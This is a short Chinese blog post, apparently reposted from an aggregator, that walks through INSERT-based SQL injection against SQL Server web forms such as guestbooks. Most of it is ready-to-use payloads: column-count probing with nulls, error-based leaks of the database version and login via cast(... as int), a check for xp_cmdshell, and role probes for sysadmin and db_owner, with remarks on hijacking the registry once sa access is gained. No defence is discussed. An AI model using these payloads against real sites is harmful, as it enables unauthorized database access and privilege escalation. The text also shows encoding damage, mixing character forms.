insert式注射攻击解析
當(dāng)碰到一些特殊的站時可以試著用insert注入(如:留言版神馬的..前提是必須與數(shù)據(jù)庫交互)
首先我們先了解下insert的語法
insert into table (column_name_1,column_name_2,column_n) vlaues (value_1,value_2,value_n)
當(dāng)value值數(shù)大于column時,數(shù)據(jù)庫就會爆出錯誤
于是當(dāng)我們在網(wǎng)頁中提交
a’,null,null,null,null,null);– 如返回錯誤頁面
a’,null,null,null,null,null,null);–? 如返回正常頁面(至于過濾單引號的問題就不在本文討論范圍內(nèi)了)
說明當(dāng)前表字段數(shù)為7(不知是我理解錯了不).
a’,cast(@@version as int),null,null,null,null,null);–試著爆出數(shù)據(jù)庫版本
–cast 將@@version的值以整型輸出到頁面
a’,cast(system_user as int),null,null,null,null,null);–當(dāng)前登陸名
a’,null,null,null,null,null,null);(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell’); –是否存在xp_cmdshell
查看權(quán)限
a’,null,null,null,null,null,null);(select IS_SRVROLEMEMBER(‘sysadmin’))=1; –sa ..如果爆出sa就爽了,可以劫持注冊表神馬的..
a’,null,null,null,null,null,null);(select IS_MEMBER(‘db_owner’))=1;–dbo ..可以backup或參考http://www.cnblogs.com/allyesno/archive/2007/07/29/835151.html
a’,null,null,null,null,null,null);(select IS_MEMBER(‘public’))=1;–public .這權(quán)限還真沒成功過..
轉(zhuǎn)載于:https://www.cnblogs.com/swane/archive/2011/04/02/2003245.html
總結(jié)
以上是生活随笔為你收集整理的insert式注射攻击解析的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 用批处理测试MTU
- 下一篇: visual c++ for .net(